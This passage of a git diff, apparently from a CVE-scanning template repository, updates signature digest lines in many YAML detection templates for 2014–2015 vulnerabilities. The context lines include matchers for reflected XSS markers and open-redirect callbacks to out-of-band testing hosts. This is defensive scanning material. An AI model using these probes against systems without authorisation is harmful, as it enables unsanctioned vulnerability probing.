+48,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022006f936d048fb0f6cfc3d7db066e36ecd4ca4d50ee2615451b062a2530bf31e10022041122bb6a966a293fe253756202f09b7c3907ddba3da8f17f9ca353bee363ea4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100afb7943404c020ab3e22bc176a28a3d32a6175c814a222fd688af7aaa3f00dd0022100d61892a10940fed5b4f6157c49c02e3b46aaced38085822154de3b7477a7de80:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-9608.yaml b/http/cves/2014/CVE-2014-9608.yaml index 3fd3303735d..308afab2351 100644 --- a/http/cves/2014/CVE-2014-9608.yaml +++ b/http/cves/2014/CVE-2014-9608.yaml @@ -56,4 +56,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402204c53a3018a3cb8fde12196c6ef754fe89c2336eccf04046406501195d481e08d022073c614769a1f957fc38a9b118c15bf93900223e00cbc3e8cbec05887c40de706:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221008afb056de1770ba18e429695ae8fe83ceb236afa93d49b6509a508cad83ef80f022100df00d8089b8458d2ed90f1eb0f03c51ffbe8b2e30736abf6b0176b1be0d9fbcc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-9614.yaml b/http/cves/2014/CVE-2014-9614.yaml index 9c4f2923b39..e57d28e7e81 100644 --- a/http/cves/2014/CVE-2014-9614.yaml +++ b/http/cves/2014/CVE-2014-9614.yaml @@ -55,4 +55,4 @@ http: - type: status status: - 302 -# digest: 490a00463044022002f9e1c490e1cee79b40ccfbcf18119ef8cb00d29302aed679dbb395fa034df70220351c97c5641208ce44676d1e0334da87d9c0e4fefdf646432ecdb255e95d0fd7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022059d882f9a0082271fe158d5ed36f7a8480ecb1d2b5da20a3b4650ab397c4c11a0220453ead39ffccb071c163da8c21167a4741a0b7a4fbd7945bca133cd37f988298:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-9615.yaml b/http/cves/2014/CVE-2014-9615.yaml index 292f3418b67..4eb03f60a6b 100644 --- a/http/cves/2014/CVE-2014-9615.yaml +++ b/http/cves/2014/CVE-2014-9615.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100872a862a6e5846365838f8f8e38ead5b66df66467a15ecc3ed59a1d4501c31ac022100e36b93ac98fcb681b4515df6a90640ea0ec4ae9943955a60c7e121a5975de508:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100858e8cbcf5867b8332c3ce18610b8e1a0c0cd5000eb1f194bd491b802d3d368f02210083178f30258e9d841fffe005a6604133f5fbab09650cd9fa6a2be77838d9e93c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-9617.yaml b/http/cves/2014/CVE-2014-9617.yaml index a8f6e152bbf..5d2271710de 100644 --- a/http/cves/2014/CVE-2014-9617.yaml +++ b/http/cves/2014/CVE-2014-9617.yaml @@ -38,4 +38,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' -# digest: 4b0a00483046022100d81d033a0a62bdede98a506c22ca29a18137ba1d6a61bfc17ec9d83dab71318d022100d92d70de15a07a2b7ef287e2d12963dc53d91d8fead9111aa691d74b438b7589:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d180e99d4aea9a7970c4b9c67183e64015c8e539d580fd98125fe1939852f8ab022015c4c239c7de178fe2d366c61500eab6942231c06065661cc674635ecbb0291f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-9618.yaml b/http/cves/2014/CVE-2014-9618.yaml index d7a23fe9d17..53b78dc4c9d 100644 --- a/http/cves/2014/CVE-2014-9618.yaml +++ b/http/cves/2014/CVE-2014-9618.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221009c36c819e78950af2a923409316345d697495fae84b58133a1332a8f9ebcadb9022069b3429b69deec0b4560afe23e5ce81528e9558cb6a3c26ebbcf778030ffa2ad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100939097f39b50f08c42ee02f9f7f8178516b26b0c99fde54c741f84ef18b697e8022100f28e8789251d12f3db14d9d7afee79c98cdacfe4819bb750f6a47a11448e4472:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-9735.yaml b/http/cves/2014/CVE-2014-9735.yaml index b718a889762..8e0a036eb72 100644 --- a/http/cves/2014/CVE-2014-9735.yaml +++ b/http/cves/2014/CVE-2014-9735.yaml @@ -79,4 +79,4 @@ http: - 'contains(body, "{{marker}}")' - 'status_code == 200' condition: and -# digest: 4b0a00483046022100f337eb037c4e1e28deac78db8e778cf2b559d76725265202806ff7a45859b036022100d8072adf60d62c091855853ed6abaec2cde2b210072179b5c9926ba942aeb402:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b576393d0e280cabf445729e7679a21c6653e994b167f83e94c6e86ccce913eb022040eed9f8b5008f364bc0ea1827047dd94c0c0f216e934295006f8b3863628c8c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-0554.yaml b/http/cves/2015/CVE-2015-0554.yaml index 977815f0861..98bc8e56074 100644 --- a/http/cves/2015/CVE-2015-0554.yaml +++ b/http/cves/2015/CVE-2015-0554.yaml @@ -47,4 +47,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502200aaf2722234b1629267e6639c44e026488a245e2d6291b2d627e268f0c554b98022100e800d6949b952972eda0716088f568fe2aeefd76bb5290963b10c8036736f841:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502203966eade80e082a42f01981c5cb072fe75b9db5491aef4d7110e9819c2bc9ffb022100c2615f866cdb10997e3e4c203c431ae399aa88aaaff34c7ae8b0772a32aa0b33:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-1000012.yaml b/http/cves/2015/CVE-2015-1000012.yaml index 1bec2f7da15..b889bafeb7f 100644 --- a/http/cves/2015/CVE-2015-1000012.yaml +++ b/http/cves/2015/CVE-2015-1000012.yaml @@ -46,4 +46,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100edff07c1f02ebf5ea42afc85b3c663db1aabfd8ace89480fe2957bb07adbf0fc022010e863f40355b2a92e1befb0240596e31df8fdde91837566d66d498d9866788d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220490ffeb9a893ff0ef26129ba9617241fabbd49ec583b60dd69921d32a2e73b79022100c4719ead6d76f31923af9cdb8dce054c4bd07a03ee73a3afcdd9e7615eb6b4c4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-10141.yaml b/http/cves/2015/CVE-2015-10141.yaml index aa8c4e1993e..9523755ef92 100644 --- a/http/cves/2015/CVE-2015-10141.yaml +++ b/http/cves/2015/CVE-2015-10141.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220398cd418266e4b0c8c39a9f92aa05b1031a5c302cbdfdbefd82ec4e261bdd5af022100ff4cfc69fff8615c2abd453c6781a908579391f21e3e9dcfbd61d5c0c746b8b7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205633c9846cd47b0ae7470988f34f9436aa551f53329fe60708d630e2781f07b7022100a94f096b92c5165169e2d5333cbc752b3a4dac82269c8e086b51580bb92d5d3f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-2067.yaml b/http/cves/2015/CVE-2015-2067.yaml index 5fb1dd850cd..09d4a018da8 100644 --- a/http/cves/2015/CVE-2015-2067.yaml +++ b/http/cves/2015/CVE-2015-2067.yaml @@ -46,4 +46,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220723e1f8a40fe40b54c6d15483aacb883de09f5895031a198f116c2252dfc723e02202afecfc7c5dec94114a4010e99d35aea06365f79db5b619bad63696546fd8dfc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c043ece6f153428f1238615689c2422ce4a10918d5e34f32cb83251671cd9d8e022100a30479f3b06665d70a87ecd40d760836e97f127a8be39423c5372920e7eec4eb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-2068.yaml b/http/cves/2015/CVE-2015-2068.yaml index 909903af5e4..d45078d9d93 100644 --- a/http/cves/2015/CVE-2015-2068.yaml +++ b/http/cves/2015/CVE-2015-2068.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022054e7743ef3dbde428666d8db4e8aefc7c8485a4933e671fef9794972c10a1a7a02210096486a28f86ceb238d7aa9ad9fd880a2ad042c78082e5e36f08b6318865c304e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210082623b7ba1b2805f06140748f7cf0489c72757fff793c780d6927a5213c8b72c02206f888705af480c73feb2d4705e9e5464ea538f277be8f267a215dc8f7d196917:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-2196.yaml b/http/cves/2015/CVE-2015-2196.yaml index 876d2346df8..a87179b5ef1 100644 --- a/http/cves/2015/CVE-2015-2196.yaml +++ b/http/cves/2015/CVE-2015-2196.yaml @@ -44,4 +44,4 @@ http: - 'status_code == 200' - 'contains(body, "{\"status\":true,\"data\"")' condition: and -# digest: 490a00463044022077cf8b9e99f348819e11d9d87576891654371c65a1cac32d1cd9a30a7ac0cccc02206f71e3d48601490df8fe0f8dbfa017fea4c68b8169b3c214d333efb4efca7927:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220373736fe2aa0b3f9a573e0874a6af69c056dd3b11d52bcef8196d0bea5b6efe802210085b0bf506a76e9007891ebf2462f0c78f2d688b3913d559fdf6812e24ba5eb62:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-2755.yaml b/http/cves/2015/CVE-2015-2755.yaml index 365e178892a..f6a90e2bf65 100644 --- a/http/cves/2015/CVE-2015-2755.yaml +++ b/http/cves/2015/CVE-2015-2755.yaml @@ -56,4 +56,4 @@ http: - 'contains(body_2, "<script>+-+-1-+-+alert(document.domain)</script>")' - 'contains(body_2, "ab-google-map-travel")' condition: and -# digest: 4a0a004730450221009330a39f29f46b0f0b9c684938def1de82c38cfe688438a41979f3ab918e7089022074cf2a67518f0a9d7627dae55b81a4f3337e061fecf874b6a4fadb8e4ac7cfb9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210095a7bafc057464c7e925e6ee33929b3ed8cb1df1fdfa6319da0cff47c0f66da3022014c36ac739fcc056563ccb912b45a8fa1ff1b3f9c455d5d10bb3d63b47dd5c92:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-2794.yaml b/http/cves/2015/CVE-2015-2794.yaml index 545386fd8cd..57666099b57 100644 --- a/http/cves/2015/CVE-2015-2794.yaml +++ b/http/cves/2015/CVE-2015-2794.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100de2ad0dbcb68e1788c42e1e348f50a57f88f410b89f3abff6ffc879c811bc6020221008a37211d7fed92642db7517aa726cc602e99bb9c04c9bfb1c34818aa1e84baf8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d17431e0911cf0caf672ac9e97233bf853099a3f77835eca54b45892704bd5f302207a3bb9a90924e31fdd2754186f532655304a574d00f7ea920f660dea9dcef231:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-2863.yaml b/http/cves/2015/CVE-2015-2863.yaml index 91ff62015a1..eba7965d78d 100644 --- a/http/cves/2015/CVE-2015-2863.yaml +++ b/http/cves/2015/CVE-2015-2863.yaml @@ -42,4 +42,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)oast\.me\/?(\/|[^.].*)?$' # https://regex101.com/r/idfD2e/1 -# digest: 4a0a004730450220426488e66aba14bb4a9ac8a2661abef164d5e2ca7dad7e49d84ce43657ba10a902210082c0ab4a7d898c744b952f528c19c085e5457d5469cb5b52625bfefcb4a05394:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221008b3993608a8435516dd3f4f9ddf01e244a89b83a2d80a5274bcff4bfeea59f740221008e66ae621f0d8ae4047f554b4dfa74b211edeac10c29d6e099815fdd8118a342:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-3337.yaml b/http/cves/2015/CVE-2015-3337.yaml index 9d8723033c5..0a0faaa44fc 100644 --- a/http/cves/2015/CVE-2015-3337.yaml +++ b/http/cves/2015/CVE-2015-3337.yaml @@ -45,4 +45,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100ea190acfbd83ef25ec498deaa4bf468374dc9180c3e6b924de2fc393715a75c3022100e43a2e0632b7e534df30e7d0d6b85118e781a7d88a2e280cd2afd1fec98bf91f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100e74ce99f94707420e8ba43bea045c7cc032fe75ceb9cfb5c895e90fcb4d82fc4022100c9a9e8af0dc808540280ba746fa5450461c4db39b456e5c651ae283c1e15966c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-3648.yaml b/http/cves/2015/CVE-2015-3648.yaml index 31fc4b6b53b..883c1468022 100644 --- a/http/cves/2015/CVE-2015-3648.yaml +++ b/http/cves/2015/CVE-2015-3648.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100bb6d84c3549f8f2d9583ed63e2eb31eb0dccafefa0b414451cd60427e2a4373502204255a6efc39d09ab9a57ab115b4f43402a93067f4e9eda218daa997b23a7a173:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205068453abd94224572feba3bfb82e63ac4c3bab000aa238e1f9a03127982ce13022100f3c36e68823163a779d0bec783d6404fada07c1125e6f94c915cfad9493c1a4a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-4062.yaml b/http/cves/2015/CVE-2015-4062.yaml index f6d1419a1e9..73208636c34 100644 --- a/http/cves/2015/CVE-2015-4062.yaml +++ b/http/cves/2015/CVE-2015-4062.yaml @@ -52,4 +52,4 @@ http: - 'status_code == 200' - 'contains(body_2, "newstatpress_page_nsp_search")' condition: and -# digest: 4b0a004830460221009ef010459161a324113ebf7159dd4747a20819b123452f2b96d41b2f383c0cd0022100d0eadf1fafe11497633f8b91510ed233d3c4ba5720fce780921b125714eb03ac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022078e01c50fc5773fd4c13b9501b7e5bed0d2d8691f3f6404be265927adbc53d08022100ab1da2932f351e73a1062829ec4afdc8ff0310eb9df29b3f536ab66edd4e0013:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-4127.yaml b/http/cves/2015/CVE-2015-4127.yaml index b80dfa73670..6f8130bb398 100644 --- a/http/cves/2015/CVE-2015-4127.yaml +++ b/http/cves/2015/CVE-2015-4127.yaml @@ -63,4 +63,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502204723e2b836d53e14cf5fa501c59973d1ad8c562f55d3a54a941dce5e2da5c1c2022100c36d1e9b10142eba3e5e0b62440fdf0acfe77451fff0930341d7396ba0c1d77f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221009aab97317c049e1ccca2df361e7b31059a5445de21a1a3de7a238205a2ad460d02204b52a55270d55cdcdb5716975d3489fdf22a42125ff8087f56ca6a08a1f6d427:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-4414.yaml b/http/cves/2015/CVE-2015-4414.yaml index 44d17e7b79e..ea164cc3e6e 100644 --- a/http/cves/2015/CVE-2015-4414.yaml +++ b/http/cves/2015/CVE-2015-4414.yaml @@ -45,4 +45,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022077530afb22532b0b74c3ab90ffec780bea257317e9363996609b6dcb1376ce5002206f5fa0faee292dd4f5747e894c769e00b6c53ca3d16fad8ba046f1e3636861bd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221008b3c16d088a792c5c78dc54fdb2aad470df104ff95bae3a3594341d3e27b633e0221008cd9573b90cc750aa59c1458e04986ab9ab091d8d54efbcd50ef4bae6d18fc99:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-4666.yaml b/http/cves/2015/CVE-2015-4666.yaml index b5071338480..8f6868abbf3 100644 --- a/http/cves/2015/CVE-2015-4666.yaml +++ b/http/cves/2015/CVE-2015-4666.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100b9555a56342919d056341a1af6bc2266e25767de9a66ecec5246da5ac82cebe7022100b2bf23a0979a95e8e3343a3e147eddaf439b905a6baf1db1516a494fb90ab875:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022073623c2d0b8ac385d611264f8df8d67b99e44f79f335eec8d7f2675d0e483042022011b47d8d9566942add804de7a8f06b7deee96c29be9263723a5d1bddc470a0a9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-5354.yaml b/http/cves/2015/CVE-2015-5354.yaml index b2b2c6a84c4..46f86849cfc 100644 --- a/http/cves/2015/CVE-2015-5354.yaml +++ b/http/cves/2015/CVE-2015-5354.yaml @@ -39,4 +39,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 -# digest: 4b0a0048304602210080b4d76307a724a74d66c3b3e30d12cbbb39ff8ff2f689eaced19d064af569d3022100e42561edecba2cbafadacf09d69c40fdb5eed1e1c949b4716fe86e53b7c42444:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022048db6997de4191d7e5f5dd05851ee71232a43153b5cf4cc9d4c5a15341915f5d022024f1f3e8e59b30feb9f517e427d054d8d5c0bafac716e1b07454c7535659614c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-5461.yaml b/http/cves/2015/CVE-2015-5461.yaml index cf568105671..0cdd03c0a95 100644 --- a/http/cves/2015/CVE-2015-5461.yaml +++ b/http/cves/2015/CVE-2015-5461.yaml @@ -41,4 +41,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' -# digest: 490a00463044022036a8cd73f077defec78fb62d1b82f309843579fe329ee8003998c5ea8441944a0220464c2de4a6b21a694ba1819c45ade4fce8b9d61964a138ee7ebb916de9e31b74:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022033c5139358c3856a0917a2cd437153616d9dd4d94adb15f283041b1b3acdbcdf022100e48fb47d280fa63e38009ef04d4b3b2081d70087404c67fe1c10f8f11329cf8e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-5469.yaml b/http/cves/2015/CVE-2015-5469.yaml index fa8a149590f..d99f242fb81 100644 --- a/http/cves/2015/CVE-2015-5469.yaml +++ b/http/cves/2015/CVE-2015-5469.yaml @@ -44,4 +44,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022059454ab0c9a9ab1e2764ece84347fffb8e7f6316a61efbeec75c096db019424f022100cdc5e1ed61b9ceb4f1d6d0244e5cea7e1515c865b1cfaba93eff3f04527b31e5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022023f918e41ae4338e9dd24be7dc3b7de330681e970ba72ee0f7dd3f1c7d836c4e02204cd8f91fa0a8578afa05052d23fca520de199fb7c055c50000adac3c48d7ad09:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-5471.yaml b/http/cves/2015/CVE-2015-5471.yaml index 2748ce9fea9..adb9eece073 100644 --- a/http/cves/2015/CVE-2015-5471.yaml +++ b/http/cves/2015/CVE-2015-5471.yaml @@ -44,4 +44,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100a8ada9c1a3543e046de71b8ea2abfd81a85210e5df4acb39a7fc5bc2538b3a14022100e8ee0e31c5b368287f3166d80de28f8c06a58e47ca6f06ad6db05e7877dd58ca:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022027e4e3ca32f8c46dbe29d9c5316e69d1ce10ba846d6f30ad4472728aac348cfa022100efb1039c3ad1671cfd19d34ebb3fa9dc85888ba2e8a577176a4200b2eb4d25fb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-6477.yaml b/http/cves/2015/CVE-2015-6477.yaml index 75d9369a055..8fc0f5ae02a 100644 --- a/http/cves/2015/CVE-2015-6477.yaml +++ b/http/cves/2015/CVE-2015-6477.yaml @@ -56,4 +56,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502210095c99f8267d5fb0d5da169d2b6e5d59ed36dc9b60e889621ccc48e9e1acabd5e02201674bb73b2538748915317b595a41378e4b0507e8498ed41b620a8e8de38a396:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ad1c45920da04d8dd1acce22729f229da9287a8787081bee83502fbe05a756560220167e84bba98365ab33cbf9e17dc1f6d54f2b2e0b58d505de8303d36a4c886425:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-6544.yaml b/http/cves/2015/CVE-2015-6544.yaml index 4fc6f3e7246..0d9bdcf8408 100644 --- a/http/cves/2015/CVE-2015-6544.yaml +++ b/http/cves/2015/CVE-2015-6544.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502207a19c07b3f8db5719e8edcbf891880005aad7a076a931e991f2700ad0287dda9022100a6da4fd9b722bf95230f616d9736b01ae8be4c162c9148cde76495cd8c6fe4da:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221009b232f144bd9e7b9a8a48fc50dae3931e6f876e6776cb485bf809280636d9bbf022061f8d062ff9d9b9f5cc4abdadb4325078d6198a408a085c09cc08ebecca63302:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-6920.yaml b/http/cves/2015/CVE-2015-6920.yaml index 4d1b552c9e6..9c742aca590 100644 --- a/http/cves/2015/CVE-2015-6920.yaml +++ b/http/cves/2015/CVE-2015-6920.yaml @@ -64,4 +64,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220225ad8379fe1f6538ca197aba6cab795bed0607cfbbbeb60ec040aae0fc91a6a022100c0289b017cea52c52207b381a60fcae373567b9d6fca2e6617e6175b183de238:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502206238a9ebc357bb719e5639e77dc568553e7bdb3d053c7ad0a23fef32c569dd4f022100c9d837f3a4e06bed52813f308de18c464e1e25a27a450736e379d1e9bafc7505:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-7377.yaml b/http/cves/2015/CVE-2015-7377.yaml index 0ef8ff6014b..12287d5abdd 100644 --- a/http/cves/2015/CVE-2015-7377.yaml +++ b/http/cves/2015/CVE-2015-7377.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502210098734a7caf90c159e5de39bc078698401545cb924792a6c6946cfadd5776340902205308a5346b54d531f889fd57486fc02c8d62546673091197442f295ad479d71f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c0650c8dd59e5250ba0fff6addaee9dc8b6d28837207dadac6cfdef6c9addfd902204657199477f747bf4a30996bf4a1f5ffb2f0b56d78e9d3ff0d8f18a350fb0c5a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-7780.yaml b/http/cves/2015/CVE-2015-7780.yaml index e659b511188..3d404f46a93 100644 --- a/http/cves/2015/CVE-2015-7780.yaml +++ b/http/cves/2015/CVE-2015-7780.yaml @@ -54,4 +54,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220450dd0ce38928aa4a498b4bcc7c128a82124da1714d912955ba8dc94347b269402201d88b3b9dd331a6a08e803d028d50feaf6a7c1a099aa87e141ee81db902b761f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204944715559a8db864d13c4682630852e891929ec15d91910ccac96f2d392f5c302200555e3e82fbd26d015cfb436883c8a4147bbfba28d741d11300b5a54ae61d754:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-7823.yaml b/http/cves/2015/CVE-2015-7823.yaml index bf94c98d492..a49a39cc3c8 100644 --- a/http/cves/2015/CVE-2015-7823.yaml +++ b/http/cves/2015/CVE-2015-7823.yaml @@ -43,4 +43,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' -# digest: 4a0a00473045022023ac0208e02829fdcc44e4ce3f3b51904123f31dcab7813b4347b6756ad4ff6f022100f2732589fee634fdfe7e27946eec581aab2590d5997b0f5445ff758f9abc8259:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f19a7d34bfde1df8aef8fcf00f5feee921418b951e5b45aaa0cec7d05a603ec5022100a561c2de65312101f06f4ed666becc2fc8df28904ecabad91e5143bf077dc7fb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-8349.yaml b/http/cves/2015/CVE-2015-8349.yaml index 00ccbffc45e..0c094733b0e 100644 --- a/http/cves/2015/CVE-2015-8349.yaml +++ b/http/cves/2015/CVE-2015-8349.yaml @@ -47,4 +47,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502210085973c2bd6480f3dbd6414956093011deea3258f5e23b732e652db8c91d7f6460220349295b41a971908a84f3bc3b21cdff2ef1add203316990ac51fe7f3cf7b4d46:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ce9dd20469a4b935be28b77c280b29547ec3b08de055e21dc5da01f3417d176902206a8abc0362168a6c4275ce079ad217830b8450ceb6fdc21095897532ef8ddd51:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-8350.yaml b/http/cves/2015/CVE-2015-8350.yaml index 66cf4ef959a..77ccdf62003 100644 --- a/http/cves/2015/CVE-2015-8350.yaml +++ b/http/cves/2015/CVE-2015-8350.yaml @@ -73,4 +73,4 @@ http: - 'contains_all(body, "open-tab", "<script>alert(document.domain)</script>")' - 'contains(content_type, "text/html")' condition: and -# digest: 4b0a00483046022100dddb5e3ad69bfc66497f3277465bcdecb737e7aa3adb2702905fb02b195b91a1022100b1d7e53df45858d35578f3fed3495bdf1a8c3d0ff57472ba56352f1958dd2d03:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022056ba00b62a4c5ac78528f2cffb58ac4ebe6c5bc2f80a7a6c8047dc939b18077d022100aae7e635312638222d002e6a77647183268601514b3fc3e99b952fdf1fb136fb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-8813.yaml b/http/cves/2015/CVE-2015-8813.yaml index da8f98ed145..a2562c9acb4 100644 --- a/http/cves/2015/CVE-2015-8813.yaml +++ b/http/cves/2015/CVE-2015-8813.yaml @@ -39,4 +39,4 @@ http: part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" -# digest: 490a0046304402202d3ebdf22add767e8d450c3a1be6358b60029c941352e1a0609724d837082d8c022008bf2f9be4886aefbe82a540b6228da8ee17741ccbe83672b028e4160ab411a9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502204df0c5c8627425a82f40a26521c5ceba0d9780d3398ead158f5e56f133af6fe7022100e25fda57b108d63d5a5ceffff363a2746213f8ef789b0f7ff90723bf91673dff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-9406.yaml b/http/cves/2015/CVE-2015-9406.yaml index ec10cdb3b4f..a4d6a5d6e11 100644 --- a/http/cves/2015/CVE-2015-9406.yaml +++ b/http/cves/2015/CVE-2015-9406.yaml @@ -47,4 +47,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022035a183352b2fe1797a3247aa837762347859beb1760323615ce346dd97d96937022100aa17dce2f872cca48caa4de26e2d9a0cd5a7123274a1c614a57cef7445a0b5ad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 